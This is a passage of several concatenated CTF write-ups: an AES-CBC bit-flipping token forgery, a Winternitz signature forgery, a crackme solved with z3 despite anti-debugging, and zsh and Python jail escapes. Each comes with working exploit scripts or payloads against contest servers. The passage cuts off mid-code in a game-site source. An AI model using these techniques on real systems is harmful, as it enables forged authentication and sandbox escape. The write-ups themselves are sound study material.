takeoff and crash overloaded plane at runway- Retry until all runways are blocked and we get the flag I felt the need to write a well structured exploit for this problem to avoid implementation problems, but that is of course handy for sharing the solution with you.You'll find it as my [PCaS exploit gist](https://gist.github.com/Ik0ri4n/8bea87b96cff96316ee857058695eee0), you'll need to replace `rumble.host` with `localhost` though.Big thanks to Lukas, the author, I really enjoyed analyzing the challenge and implementing the exploit!Also thanks to [Martin](https://blog.martinwagner.co/) for supporting me with the edge cases and helping me keep my sanity.
[![la-housing-portal - LA CTF 2024](https://img.youtube.com/vi/Z4P667ayUsg/0.jpg)](https://www.youtube.com/watch?v=Z4P667ayUsg&t=399 "la-housing-portal - LA CTF 2024")
The WOLPHV group (yes, this is an actual article) group encrypted our files, but then blocked us for some reason. I think they might have lost the key. Let's log into their accounts and find it... `nc blocked1.wolvctf.io 1337` [server.py](https://github.com/Nightxade/ctf-writeups/blob/master/assets/CTFs/Wolv-CTF-2024/crypto/blocked-1/server.py) --- We're provided a Python source file: ```py """----------------------------------------------------------------------------NOTE: any websites linked in this challenge are linked **purely for fun**They do not contain real flags for WolvCTF.----------------------------------------------------------------------------""" import randomimport secretsimport sysimport time from Crypto.Cipher import AES MASTER_KEY = secrets.token_bytes(16) def generate(username): iv = secrets.token_bytes(16) msg = f'password reset: {username}'.encode() if len(msg) % 16 != 0: msg += b'\0' * (16 - len(msg) % 16) cipher = AES.new(MASTER_KEY, AES.MODE_CBC, iv=iv) return iv + cipher.encrypt(msg) def verify(token): iv = token[0:16] msg = token[16:] cipher = AES.new(MASTER_KEY, AES.MODE_CBC, iv=iv) pt = cipher.decrypt(msg) username = pt[16:].decode(errors='ignore') return username.rstrip('\x00') def main(): username = f'guest_{random.randint(100000, 999999)}' print(""" __ __ _ ______ / /___ / /_ _ __| | /| / / __ \\/ / __ \\/ __ \\ | / /| |/ |/ / /_/ / / /_/ / / / / |/ /|__/|__/\\____/_/ .___/_/ /_/|___/ /_/""") print("[ password reset portal ]") print("you are logged in as:", username) print("") while True: print(" to enter a password reset token, please press 1") print(" if you forgot your password, please press 2") print(" to speak to our agents, please press 3") s = input(" > ") if s == '1': token = input(" token > ") if verify(bytes.fromhex(token)) == 'doubledelete': print(open('flag.txt').read()) sys.exit(0) else: print(f'hello, {username}') elif s == '2': print(generate(username).hex()) elif s == '3': print('please hold...') time.sleep(2) # thanks chatgpt print("Thank you for reaching out to WOLPHV customer support. We appreciate your call. Currently, all our agents are assisting other customers. We apologize for any inconvenience this may cause. Your satisfaction is important to us, and we want to ensure that you receive the attention you deserve. Please leave your name, contact number, and a brief message, and one of our representatives will get back to you as soon as possible. Alternatively, you may also visit our website at https://wolphv.chal.wolvsec.org/ for self-service options. Thank you for your understanding, and we look forward to assisting you shortly.") print("<beep>") main()``` Basically, the idea is that we need to modify a ciphertext encrypted with AES CBC mode such that, when decrypted, it will return something different. This is very similar to [this challenge](https://nightxade.github.io/ctf-writeups/writeups/2024/Iris-CTF-2024/crypto/integral-communication.html) that I made a writeup about Iris CTF 2024's Integral Communication challenge. For an explanation, read this writeup. Only, ignore the part about errors and fixing the IV, since WolvCTF's challenge conveniently includes this: ```pyusername = pt[16:].decode(errors='ignore')``` The explanation should be comprehensive for WolvCTF's challenge here, so here is the final implementation: ```pyfrom pwn import *import binasciifrom Crypto.Util.strxor import * p = remote('blocked1.wolvctf.io', 1337)p.recvuntil(b'as: ')username = p.recvline().decode('ascii')[:-1]p.sendlineafter(b'> ', b'2')enc = binascii.unhexlify(p.recvline().decode('ascii')[:-1]) injection = strxor(strxor(enc[16:16+12], username.encode()), b'doubledelete') payload = enc[:16] + injection + enc[16+12:]payload = binascii.hexlify(payload) p.sendlineafter(b'> ', b'1')p.sendlineafter(b'> ', payload) print(p.recvrepeat(1).decode('ascii'))``` Run the script to get the flag! wctf{th3y_l0st_th3_f1rst_16_byt35_0f_th3_m3ss4g3_t00}
A simple implementation of the Winternitz signature scheme. `nc mc.ax 31001` [server.py](https://github.com/Nightxade/ctf-writeups/blob/master/assets/CTFs/Dice-CTF-Quals-2024/server.py) --- We're provided a single file, `server.py`: ```py#!/usr/local/bin/python import osfrom hashlib import sha256 class Wots: def __init__(self, sk, vk): self.sk = sk self.vk = vk @classmethod def keygen(cls): sk = [os.urandom(32) for _ in range(32)] vk = [cls.hash(x, 256) for x in sk] return cls(sk, vk) @classmethod def hash(cls, x, n): for _ in range(n): x = sha256(x).digest() return x def sign(self, msg): m = self.hash(msg, 1) sig = b''.join([self.hash(x, 256 - n) for x, n in zip(self.sk, m)]) return sig def verify(self, msg, sig): chunks = [sig[i:i+32] for i in range(0, len(sig), 32)] m = self.hash(msg, 1) vk = [self.hash(x, n) for x, n in zip(chunks, m)] return self.vk == vk if __name__ == '__main__': with open('flag.txt') as f: flag = f.read().strip() wots = Wots.keygen() msg1 = bytes.fromhex(input('give me a message (hex): ')) sig1 = wots.sign(msg1) assert wots.verify(msg1, sig1) print('here is the signature (hex):', sig1.hex()) msg2 = bytes.fromhex(input('give me a new message (hex): ')) if msg1 == msg2: print('cheater!') exit() sig2 = bytes.fromhex(input('give me the signature (hex): ')) if wots.verify(msg2, sig2): print(flag) else: print('nope') ``` Given that this problem is about the Winternitz signature scheme, I decided to look it up. The diagram on [this site](https://sphere10.com/articles/cryptography/pqc/wots) explained pretty much everything about the algorithm succinctly. Notably, the Winternitz signature scheme is a one-time signature scheme. Meaning, using it again could pose problems. However, looking at the provided source code, it seemed that the service always generated a completely random key upon connection, and we are only given 1 encryption before we are tasked to find our own. In fact, the implementation in the source file seemed to be a standard Winternitz signature scheme. I was left a bit confused for a while as I tried to look for potential vulnerabilities in the source file or search for them online. Unfortunately, the source code provided nothing apparently obvious to exploit, and all the research papers online seemed to say that Winternitz was very secure. After a while of searching, I ended up stumbling upon [this paper](https://eprint.iacr.org/2023/1572.pdf). On page 5, it explains the following: If the WOTS scheme were used just with the $$l_1$$ hash chains representingthe message digest $$m$$, an adversary could trivially sign any message, wherethe digest $$r$$ consists only of chunks $$r_i$$, where $$r_i ≥ m_i$$, $$∀i ∈ [0, l_1 − 1]$$. This isbecause the adversary gains information about intermediate hash chain nodesfrom the original signature. Information that was prior to the signing operation,private. The adversary can simply advance all signature nodes by $$r_i − mi$$ toforge a signature. Basically, this exploit relies on the process of the WOTS scheme, a.k.a. the Winternitz One-Time Signature. Learn how it works before moving on in this writeup! Then the writeup will make a lot more sense. Let $$n$$ represent each byte of the sha256 hash of a message. WOTS hashes each of the 32 private keys $$256-n$$ times to obtain the signature, and verifies the signature by hashing each of its 32-byte blocks $$n$$ times. Therfore, given message $$m_1$$ and $$m_2$$, we can essentially forge the signature if $$256-n_1 < 256-n_2$$ for every single 32-byte block. Note that here, $$n_1$$ represents the byte 1,2,3...32 of $$m_1$$'s sha256 hash, and similarly $$n_2$$ does the same with $$m_2$$. The comparison occurs between the corresponding bytes, i.e. byte 1 of $$m_1$$ and byte 1 of $$m_2$$, etc. This is because, if the aforementioned condition is true, we can simply hash each 32-byte block of the signature that the signature oracle/service provides to us the necessary number of times until it is essentially as if we took each private key block and hashed it $$256-n_2$$, for each $$n_2$$ of the sha256 hash of $$m_2$$. Here's an example. Let's say the first byte of the sha256 hash of $$m_1$$ is 137, and the first byte of $$m_2$$'s is 80. The first 32-byte block of the signature of $$m_1$$ is obtained by repeatedly hashing the first 32-byte private key $$256-137=119$$ times. Meanwhile, in order to obtain the first 32-byte block of $$m_2$$'s signature, we'd have to repeatedly hash the first 32-byte private key $$256-80=176$$ times. Notice how we can essentially just hash the first 32-byte block of $$m_1$$'s signature $$176-119=57$$ more times to obtain the first 32-byte block of $$m_2$$'s signature? That's the key idea. And if $$256-n_1 < 256-n_2$$ for each byte of the sha256 hashes of $$m_1$$ and $$m_2$$, that means we can do this for every single 32-byte block of the signature! So all we need to do now is find a pair of messages such that their sha256 hashes satisfy this condition, where $$m_1$$ is greater than $$m_2$$ for every corresponding byte. We can actually very simply brute force this. Essentially, I tried to greedily select a message where the minimum byte of the sha256 hash was the maximum possible, and another message where the maximum byte of the sha256 hash was the minimum possible. At each step, if either message changed, I would check if it satisfied the aforementioned condition for all 32-byte blocks, i.e. the sha256 hash with the greater bytes was greater than the sha256 hash with smaller bytes for every single corresponding byte pair. It's not a perfect greedy algorithm -- I'd love to know if there is actually a better algorithm to do this -- but it worked out in the end! Here was my implementation of it: ```pyfrom hashlib import sha256 largest_min_value_of_maxlist = 0smallest_max_value_of_minlist = 256minlist = []maxlist = []min_msg = ''max_msg = ''for i in range(10000000): h = sha256(str(i).encode()).digest() mx = max(list(h)) mn = min(list(h)) smallest_max_value_of_minlist = min(smallest_max_value_of_minlist, mx) if smallest_max_value_of_minlist == mx: # print("Min:", minsum, list(h), end='\n\n') minlist = list(h) min_msg = str(i).encode() if maxlist == []: continue s = '' for i in range(32): s += ('1' if minlist[i] < maxlist[i] else '0') print(s) if s == '1'*32: break largest_min_value_of_maxlist = max(largest_min_value_of_maxlist, mn) if largest_min_value_of_maxlist == mn: # print("Max:", maxsum, list(h), end='\n\n') maxlist = list(h) max_msg = str(i).encode() s = '' for i in range(32): s += '1' if minlist[i] < maxlist[i] else '0' print(s) if s == '1'*32: break for i in range(32): print(1 if minlist[i] < maxlist[i] else 0, end='') print()print(min_msg, minlist)print(max_msg, maxlist)print(smallest_max_value_of_minlist, largest_min_value_of_maxlist)``` This ended up returning the following messages and corresponding hash bytes: ```pymsg1 = b'1973198'msg2 = b'752802'msg1_hash = [144, 246, 206, 112, 109, 246, 159, 156, 133, 235, 192, 200, 226, 105, 136, 87, 207, 242, 207, 117, 130, 177, 187, 166, 152, 86, 219, 116, 247, 147, 129, 94]msg2_hash = [72, 126, 124, 84, 46, 60, 148, 99, 45, 75, 40, 120, 38, 95, 7, 82, 57, 29, 32, 90, 91, 73, 27, 117, 92, 32, 134, 90, 77, 77, 92, 80]``` Notice how every byte in the msg1_hash is greater than its corresponding byte in the msg2_hash? That's exactly what we need. Now, we can very easily create a short script to interact with the remote service to execute the exploit! ```pyfrom hashlib import sha256from pwn import *import binascii msg1 = binascii.hexlify(b'1973198')msg2 = binascii.hexlify(b'752802')msg1_hash = [144, 246, 206, 112, 109, 246, 159, 156, 133, 235, 192, 200, 226, 105, 136, 87, 207, 242, 207, 117, 130, 177, 187, 166, 152, 86, 219, 116, 247, 147, 129, 94]msg2_hash = [72, 126, 124, 84, 46, 60, 148, 99, 45, 75, 40, 120, 38, 95, 7, 82, 57, 29, 32, 90, 91, 73, 27, 117, 92, 32, 134, 90, 77, 77, 92, 80] diffs = [msg1_hash[i] - msg2_hash[i] for i in range(32)]print(diffs) def hash(x, n): for _ in range(n): x = sha256(x).digest() return x p = remote('mc.ax', 31001)p.sendlineafter(b': ', msg1)p.recvuntil(b': ')sig1 = p.recvline().decode('ascii')[:-1]sig1 = binascii.unhexlify(sig1) chunks = [sig1[i:i+32] for i in range(0, len(sig1), 32)] vk = [hash(x, n) for x, n in zip(chunks, diffs)]for i in range(len(vk)): vk[i] = binascii.hexlify(vk[i]).decode('ascii')sig2 = "".join(vk) p.sendlineafter(b': ', msg2)p.sendlineafter(b': ', sig2.encode())print(p.recvline().decode("ascii"))``` And with that, we run the script and get the flag! dice{according_to_geeksforgeeks} Thoughts: Quite a nice crypto challenge with a cleverly hidden vulnerability in the problem. Perhaps I even could've figure it out myself after some time. I still think it was a great solve on my part regardless!
For the full experience with images see the original blog post! **TL;DR:** oldschool is a classic crackme binary with an interesting password check method we have to reverse.It uses ncurses terminal UI and anti-debugging measures as a small twist though. The challenge provides us with a 32-bit crackme binary and a python script containing the 50 usernames we need to find the password for.A crackme is a small program designed to test your reversing skills in a legal way.They often require finding secret data and understanding their authentication schema to obtain access.The page crackmes.de referenced in the description was a website that hosted many such challenges until 2016 (shutdown because of legal issues).Currently, the page [crackmes.one](https://crackmes.one/) hosts many of the original crackmes.de challenges as well as new ones, in case you like to try them out. The binary uses the [ncurses](https://invisible-island.net/ncurses/announce.html) library that provides a terminal-independent UI programming API.Thus you may need to install the 32-bit ncurses package to execute the library.Also, the binary seems to require a certain screen size so I needed to decrease the terminal font size a bit to get past this error.If everything is working fine you should see a window similar to this: oldschool login screen While executing and later debugging the binary helps understanding the program I needed to look at its code first to see what it does internally.Thus, I fired up my debugger and tried to execute the program while it was loading.I used ghidra for this challenge which works fine but I have to warn you that the main method will take a few minutes to load on every edit.Although it repeats the error cases to free ncurses resources it does produce an otherwise quite readable result.Binary ninja is a lot quicker but did nest every error check which produced a lot of nesting levels.In the end, you should probably stick to the tools you're used to anyway. I tried looking through the main method linearly at first but quickly abandoned this approach as it is just too big.Then I looked at the imported library methods and found the method [`new_field`](https://manpages.debian.org/testing/ncurses-doc/new_field.3form.en.html) which is used to create six fields.By their size and positioning I assumed them to be the labels, text fields and buttons.Tracing the usages of the first buttons I found the login case and a method that was passed the username and password (updated char by char on every edit of the field in a handler elsewhere).This method determines the login result and thus I will subsequently call it `password_check`. ### Passing the password check The `password_check` contains a few error cases regarding the format of usernames and passwords.For example, a username must consist of at least five blocks of four characters and the password too, though separated by hyphens.However, the most important check is an equation at the end of the function that uses a list of 25 values computed from the username and 25 others from the password. Structure of the password_check method The values from the password are the indices in a string of valid characters: `"23456789ABCDEFGHJKLMNPQRSTUVWXYZ"`.As every string in the binary, it is stored as two byte arrays that are XORed to get the real string.The values in this initial `password_list` are then remapped via a shuffle map, XORed with map of values by their position in the list and finally rotated right in blocks of 5 depending on the index of the block (no change on block 0, block 1 rotated right by one and so on).Now, I didn't look at the computation of the `username_list` in detail because we know the usernames and can just copy the code.The final equation for checking password and username is generated like this: ```cfor (user_block = 0; (int)user_block < 5; user_block = user_block + 1) { for (pass_index = 0; pass_index < name_blocks; pass_index = pass_index + 1) { check = 0; for (user_index/pass_block = 0; (int)user_index/pass_block < 5; user_index/pass_block = user_index/pass_block + 1) { check = check + username_list[user_index/pass_block + user_block * 0x10] * password_list[user_index/pass_block * 5 + pass_index] & 0x1f; } if (((user_block == pass_index) && (check != 1)) || ((user_block != pass_index && (check != 0)))) { return 0; } }}result = 1;``` The resulting strategy for finding the password to a given username I used was as follows:1. Generate `username_list` from name2. Solve equation for modified `password_list` with `z3`3. Undo the modifications in reverse order to get password ### Anti-debugging and final solution To test my approach and find out where it failed (because the equation wasn't satisfiable for almost all usernames) I wanted to debug the crackme a bit.With help from my team I managed to run the binary without errors using `gdbserver` on `localhost:1337` and connect from `gdb` via the command `target remote localhost:1337`.I then noticed changes in the global `XOR_MAP` with the XOR values for the password_list, in a map used to generate the `username_list` (I called it `USERGEN_MAP`) and in a global integer used as a starting value for the `username_list` generation (I called it `USERGEN_BASE`).After updating my values accordingly I managed to produce a correct login for the first username but the rest of the equations still weren't satisfiable.Additionally, the example only worked under the debug environment and not during normal execution.I knew the concept of such anti-debugging measures but they still managed to delay me because I couldn't find any `ptrace` call that is usually used for this.In case you haven't yet come across such measures, they usually call `ptrace` on themselves to check whether a debugger is attached to the process.After rechecking the values I copied from the binary I later traced the modifications on the global variables and found they all used a global boolean.This boolean was indeed a `ptrace_bit` set with the result of a `ptrace` system call, only ghidra didn't manage to resolve the 32-bit call as such. The modifications on the global variables are as follows:- The `XOR_MAP` values are XORed with 2, or 4 if the `ptrace_bit` is set- In the `USERGEN_MAP` two uints are swapped skipping one value, starting with offset one if the `ptrace_bit` is set- If the `ptrace_bit` is set, the `USERGEN_BASE` value is increased by 7 With these modifications included my script produced satisfiable equations for a few selected usernames under default circumstances.So I finished my solver and generated the passwords for all usernames in the `flag_maker.py` to get the flag. ```pyimport subprocessimport z3 PASSWORD_MAP = "23456789ABCDEFGHJKLMNPQRSTUVWXYZ" PTRACE_BIT = 0 SHUFFLE_MAP = [ 0x10, 0xE, 0xD, 0x2, 0xB, 0x11, 0x15, 0x1E, 0x7, 0x18, 0x12, 0x1C, 0x1A, 0x1, 0xC, 0x6, 0x1F, 0x19, 0x0, 0x17, 0x14, 0x16, 0x8, 0x1B, 0x4, 0x3, 0x13, 0x5, 0x9, 0xA, 0x1D, 0xF ]XOR_MAP = [ 0x19, 0x2, 0x8, 0xF, 0xA, 0x1A, 0xD, 0x1E, 0x4, 0x5, 0x10, 0x7, 0xE, 0x0, 0x6, 0x1F, 0x1D, 0xB, 0x11, 0x3, 0x1C, 0x13, 0x9, 0x14, 0x1B, 0x15, 0x1, 0xC, 0x18, 0x16, 0x17, 0x12 ] if PTRACE_BIT == 0: for pos in range(0x20): XOR_MAP[pos] ^= 2else: for pos in range(0x20): XOR_MAP[pos] ^= 4 # gdwAnDgwbRVnrJvEqzvs# username_list = [18,29,16,19,27,0,0,0,0,0,0,0,0,0,0,0,8,31,8,23,30,0,0,0,0,0,0,0,0,0,0,0,29,3,28,10,21,0,0,0,0,0,0,0,0,0,0,0,18,29,8,16,28,0,0,0,0,0,0,0,0,0,0,0,11,30,7,20,7,0,0,0,0,0,0,0,0,0,0,0] def solve_for_password_list(username_list: list[int]) -> list[int]: solver = z3.Solver() password_list = [0] * 25 for i in range(25): password_list[i] = z3.BitVec("p" + str(i), 4 * 8) solver.add(password_list[i] < 0x100) solver.add(password_list[i] >= 0) for pos in range(5): for index in range(5): local_58 = 0 for j in range(5): local_58 = ( local_58 + username_list[j + pos * 0x10] * password_list[j * 5 + index] & 0x1F ) solver.add(z3.If((pos == index), (local_58 == 1), (local_58 == 0))) assert solver.check() == z3.sat model = solver.model() result_list = [0] * 25 for i, p in enumerate(password_list): result_list[i] = model[p].as_long() return result_list # gdwAnDgwbRVnrJvEqzvs# IN_LIST = [18, 21, 12, 14, 2, 1, 31, 11, 30, 16, 21, 8, 27, 11, 26, 0, 13, 19, 2, 14, 28, 8, 12, 31, 3] def unshuffle(in_list: list[int]) -> str: list1 = [0] * 25 for round in range(5): for offset in range(5 - round): list1[round * 5 + round + offset] = in_list[round * 5 + offset] for offset in range(round): shifted = 5 - (round - offset) list1[round * 5 + offset] = in_list[round * 5 + shifted] list2 = [0] * 25 for pos in range(5): for index in range(5): list2[pos * 5 + index] = list1[pos * 5 + index] ^ XOR_MAP[(index + pos * 5)] list3 = [0] * 25 for pos in range(5): for index in range(5): list3[pos * 5 + index] = SHUFFLE_MAP.index(list2[pos * 5 + index]) password = "" for block in range(5): for offset in range(5): password += PASSWORD_MAP[list3[block * 5 + offset]] password += "-" return password[:-1] def solve_password_for(username: str) -> str: username_list_str = subprocess.check_output(["./generate_username_list", username])[ :-2 ].decode() username_list = [int(val, 10) for val in username_list_str.split(",")] password_list = solve_for_password_list(username_list) password = unshuffle(password_list) return password ``` The complete solution is included in the solution archive provided above.
may your code be under par. execute the getflag binary somewhere in the filesystem to win `nc mc.ax 31774` [jail.zsh](https://gthub.com/Nightxade/ctf-writeups/blob/master/assets/CTFs/Dice-CTF-Quals-2024/jail.zshs) --- We're given a "zsh" jail file: ```bash#!/bin/zshprint -n -P "%F{green}Specify your charset: %f"read -r charset# get uniq characters in charsetcharset=("${(us..)charset}")banned=('*' '?' '`') if [[ ${#charset} -gt 6 || ${#charset:|banned} -ne ${#charset} ]]; then print -P "\n%F{red}That's too easy. Sorry.%f\n" exit 1fiprint -P "\n%F{green}OK! Got $charset.%f"charset+=($'\n') # start jail via coproccoproc zsh -sexec 3>&p 4<&p # read chars from fd 4 (jail stdout), print to stdoutwhile IFS= read -u4 -r -k1 char; do print -u1 -n -- "$char"done &# read chars from stdin, send to jail stdin if validwhile IFS= read -u0 -r -k1 char; do if [[ ! ${#char:|charset} -eq 0 ]]; then print -P "\n%F{red}Nope.%f\n" exit 1 fi # send to fd 3 (jail stdin) print -u3 -n -- "$char"done ``` Looking up zsh, I found out it was essentially just a Unix shell that's typically used in Macs. It didn't seem to actually impact the problem -- i.e. most Linux commands work just the same. Taking a look through the source code, the only constraints seemed to be 1. only 6 characters were allowed for use during each session and 2. the characters of "*", "?", and "\`" were blacklisted. THe blacklisted characters are two wildcards (\* and ?) and a backtick character, which allows for certain command executions. Immediately, I figured wildcards might be important for this challenge. I looked up wildcards for Linux, and found [this site](https://tldp.org/LDP/GNU-Linux-Tools-Summary/html/x11655.htm) documenting all of them. Importantly, doing something like `[!x]` seemed to be potentially very useful, as it act basically like a `?`. After doing this, I ran `ls -al` on the service. This showed the following: ```total 16drwxr-xr-x 1 nobody nogroup 4096 Feb 2 21:56 .drwxr-xr-x 1 nobody nogroup 4096 Feb 2 13:31 ..-rwxr-xr-x 1 nobody nogroup 795 Feb 2 21:55 rundrwxr-xr-x 1 nobody nogroup 4096 Feb 2 13:31 y0u``` Testing run with `./run` shows that it's just the binary version of the jail source file. We also have a directory named `y0u`. Let's list that out with `ls y0u`. ```w1ll``` At this point, I figured it was going to be several nested directories spelling out some message starting with `y0u/w1ll`. Unfortunately, I wasn't sure how to list the next directories. In fact, I spent the next hour trying to figure out how to call `ls` on the next file using only 6 characters (I could only get it to work with 7) or test all possible directory name lengths with `[!.]` acting as a wildcard. Eventually, I realized that `ls` probably had a recursive function... wasted an hour of my life because of this T^T Sending `ls -R` to the service, I got: ```.:runy0u ./y0u:w1ll ./y0u/w1ll:n3v3r_g3t ./y0u/w1ll/n3v3r_g3t:th1s ./y0u/w1ll/n3v3r_g3t/th1s:getflag``` So that's our path! `./y0u/w1ll/n3v3r_g3t/th1s/getflag`, Because of our useful wild card `[!.]`, we can specify our charset as `./[!]` and send `./[!.][!.][!.]/[!.][!.][!.][!.]/[!.][!.][!.][!.][!.][!.][!.][!.][!.]/[!.][!.][!.][!.]/[!.][!.][!.][!.][!.][!.][!.]` to execute the getflag binary. dice{d0nt_u_jU5T_l00oo0ve_c0d3_g0lf?} TL;DR: Not knowing ls had a recursive option cost me an hour of my life.
You've been locked in the worst prison imaginable: one without any meatballs! To escape the prison, you must read the flag using Python! `nc 3.23.56.243 9011` --- After playing around with it a bit, and getting various errors, here's what I got: ```blacklist: import, dir, print, open, ', ", os, sys, _, eval, exec, =, [, ] prohibited actions: function calls without parameters, i.e. '()' code fragments: inp = eval(inp) inp = inp.replace("print", "stdout.write") out = exec(inp)``` The code fragments are the most important here. Notably, the input is evaluated first before it is executed... let's test if a function like chr() works. Turns out, it does! That means we can just write every character as a chr(some number), which will allows us to print the file. Here's a little script that helps us write our payload: ```pypayload = 'print(open("flag.txt","r").read())'for i in payload: print(f'chr({ord(i)})+', end='')``` And here's our final payload: ```chr(112)+chr(114)+chr(105)+chr(110)+chr(116)+chr(40)+chr(111)+chr(112)+chr(101)+chr(110)+chr(40)+chr(34)+chr(102)+chr(108)+chr(97)+chr(103)+chr(46)+chr(116)+chr(120)+chr(116)+chr(34)+chr(44)+chr(34)+chr(114)+chr(34)+chr(41)+chr(46)+chr(114)+chr(101)+chr(97)+chr(100)+chr(40)+chr(41)+chr(41)``` texsaw{SP4P3GGY_4ND_M34TBA11S_aa17c6d30ee3942d}
Follow the leader. [ddg.mc.ax](https://ddg.mc.ax/) --- Visit the site. Seems like some sort of game. Heading to Chrome Dev Tools with Inspect, there is a source file for (index): ```html<script src="/mojojs/mojo_bindings.js"></script><script src="/mojojs/gen/third_party/blink/public/mojom/otter/otter_vm.mojom.js"></script> <script src="/prog.js"></script> <style> #game { padding-top: 50px; } .row { display: flex; justify-content: center; } .grid { width: 30px; height: 30px; border: 1px solid rgba(0, 0, 0, 0.1); } .goose { background-color: black; } .wall { background-color: green; } .dice { } #displaywrapper { width: 100%; top: 50px; position: absolute; } #display { width: 500px; height: 300px; margin: 0 auto; background-color: rgba(255, 255, 255, 0.7); text-align: center; } #display h1 { } .hidden { display: none; } #scoreboard { text-align: center; margin-top: 50px; } #title { text-align: center; }</style> <h1 id="title">DDG: The Game</h1><div id="game"></div><div id="displaywrapper" class="hidden"> <div id="display"> <h1>You Won!</h1> Brag on Twitter </div></div><div id="scoreboard"></div> <script> var icons = [ "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgBAMAAACBVGfHAAAAD1BMVEUAAADDGBgwMDD%2F%2F%2F%2FNMzNpjlSGAAAAAXRSTlMAQObYZgAAAJJJREFUKM%2Bd0dEJgyEQA2DpBncuoKELyI3Q%2FXdqzO%2FVVv6nBgTzEXyx%2FBsw7as%2FYD5t924M8QPqMWzJHNSwMGANXmzBDVyAJ2EG3Zsg3%2BxG0JOQwRbMO6NdAuOwA3odB8Qd4IIaBPkBdcMQRIIlDIG2ZhyOXCjg8XIADvB2AC5AX6CBBAIHIYUrAL8%2Fl32PWrnNGwkeH2HFm0NCAAAAAElFTkSuQmCC", "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgAgMAAAAOFJJnAAAADFBMVEUAAADDGBgwMDD%2F%2F%2F8aApG0AAAAAXRSTlMAQObYZgAAAJZJREFUGNNtzzEOgzAMBdAoI0fpfX6QvLAW9o4ILkFnllTk3yfqSdq1tZMipAovfrIs2d%2BdFtfaG3IruCCUmY8AOCuANhsadM%2F3Y9WVT5flruAICFbnmYDeAC6IuOquMCwFGIgKpPaHftox7rgVTBCMBfkfneJlsJt6q4mGMDufDKIf0jBYmqjYahwJs8FTxNWE5BH%2BqC8RZ01veWxOMgAAAABJRU5ErkJggg%3D%3D", ]; var imageIdx = 0; function run() { for (let item of document.getElementsByClassName("dice")) { item.style.backgroundImage = "url('" + icons[imageIdx++ % 2] + "')"; } } setInterval(run, 200); let X = 11; let Y = 20; let player = [0, 1]; let goose = [9, 9]; let walls = []; for (let i = 0; i < 9; i++) { walls.push([i, 2]); } let history = []; history.push([player, goose]); const log = (msg) => { console.log(msg); fetch("/log?log=" + encodeURIComponent(msg)); }; const sleep = (ms) => new Promise((res) => setTimeout(res, ms)); window.onerror = (e) => log(e); for (let i = 0; i < X; i++) { var row = document.createElement("div"); row.className = "row"; for (let i = 0; i < Y; i++) { var elem = document.createElement("div"); elem.className = "grid"; row.appendChild(elem); } game.appendChild(row); } function redraw() { for (let item of document.getElementsByClassName("grid")) { item.className = "grid"; item.style.backgroundImage = ""; } game.children[player[0]].children[player[1]].className = "grid dice"; game.children[goose[0]].children[goose[1]].className = "grid goose"; for (let item of document.getElementsByClassName("dice")) { item.style.backgroundImage = "url('" + icons[imageIdx++ % 2] + "')"; } for (const wall of walls) { game.children[wall[0]].children[wall[1]].className = "grid wall"; } } function isValid(pos) { if (pos[0] < 0 || pos[0] >= X) return false; if (pos[1] < 0 || pos[1] >= Y) return false; for (const wall of walls) { if (pos[0] === wall[0] && pos[1] === wall[1]) return false; } return true; } redraw(); let won = false; document.onkeypress = (e) => { if (won) return; let nxt = [player[0], player[1]]; switch (e.key) { case "w": nxt[0]--; break; case "a": nxt[1]--; break; case "s": nxt[0]++; break; case "d": nxt[1]++; break; } if (!isValid(nxt)) return; player = nxt; if (player[0] === goose[0] && player[1] === goose[1]) { win(history); won = true; return; } do { nxt = [goose[0], goose[1]]; switch (Math.floor(4 * Math.random())) { case 0: nxt[0]--; break; case 1: nxt[1]--; break; case 2: nxt[0]++; break; case 3: nxt[1]++; break; } } while (!isValid(nxt)); goose = nxt; history.push([player, goose]); redraw(); }; function encode(history) { const data = new Uint8Array(history.length * 4); let idx = 0; for (const part of history) { data[idx++] = part[0][0]; data[idx++] = part[0][1]; data[idx++] = part[1][0]; data[idx++] = part[1][1]; } let prev = String.fromCharCode.apply(null, data); let ret = btoa(prev); return ret; } function win(history) { const code = encode(history) + ";" + prompt("Name?"); const saveURL = location.origin + "?code=" + code; displaywrapper.classList.remove("hidden"); const score = history.length; display.children[1].innerHTML = "Your score was: " + score + ""; display.children[2].href = "https://twitter.com/intent/tweet?text=" + encodeURIComponent( "Can you beat my score of " + score + " in Dice Dice Goose?", ) + "&url=" + encodeURIComponent(saveURL); if (score === 9) log("flag: dice{pr0_duck_gam3r_" + encode(history) + "}"); } const replayCode = new URL(location.href).searchParams.get("code"); if (replayCode !== null) replay(); let validated = false; async function replay() { if (!(await validate())) { log("Failed to validate"); return; } won = true; const replay = atob(replayCode.split(";")[0]); const name = replayCode.split(";")[1]; title.innerText = "DDG: The Replay (" + name + ") " + (validated ? "" : "[unvalidated]"); let idx = 0; setInterval(() => { player = [replay.charCodeAt(idx), replay.charCodeAt(idx + 1)]; goose = [replay.charCodeAt(idx + 2), replay.charCodeAt(idx + 3)]; redraw(); idx += 4; if (idx >= replay.length) idx = 0; }, 500); scoreboard.innerHTML = "" + winner.name + ": " + winner.score; } let winner = { score: 4, name: "warley the winner winner chicken dinner", }; async function validate() { if (typeof Mojo === "undefined") { return true; } try { log("starting " + Math.random()); const ptr = new blink.mojom.OtterVMPtr(); Mojo.bindInterface( blink.mojom.OtterVM.name, mojo.makeRequest(ptr).handle, ); await sleep(100); const replay = atob(replayCode.split(";")[0]); const name = replayCode.split(";")[1]; let data = new Uint8Array(code.length); for (let i = 0; i < code.length; i++) data[i] = code.charCodeAt(i); await ptr.init(data, entrypoint); data = new Uint8Array(1_024 * 11); data[0] = 1; idx = 8; data[idx++] = 0xff; data[idx++] = 0; data[idx++] = 0; data[idx++] = 0; idx += 4; idx += 32; idx += 32; idx += 8; data_idx = idx; LEN = 8 + 4 + winner.name.length; data[idx++] = LEN; idx += 7; data[idx] = winner.score; idx += 8; data[idx] = winner.name.length; idx += 4; for (let i = 0; i < winner.name.length; i++) { data[idx + i] = winner.name.charCodeAt(i); } idx += winner.name.length; idx += 1024 * 10; idx += (8 - (idx % 8)) % 8; idx += 8; LEN = 4 + name.length + 4 + replay.length; data[idx++] = LEN; idx += 7; data[idx++] = name.length; idx += 3; for (let i = 0; i < name.length; i++) { data[idx + i] = name.charCodeAt(i); } idx += name.length; data[idx++] = replay.length; idx += 3; for (let i = 0; i < replay.length; i++) { data[idx + i] = replay.charCodeAt(i); } idx += replay.length; idx += 32; // pubkey data[idx] = 0; var resp = (await ptr.run(data)).resp; if (resp.length === 0) { return 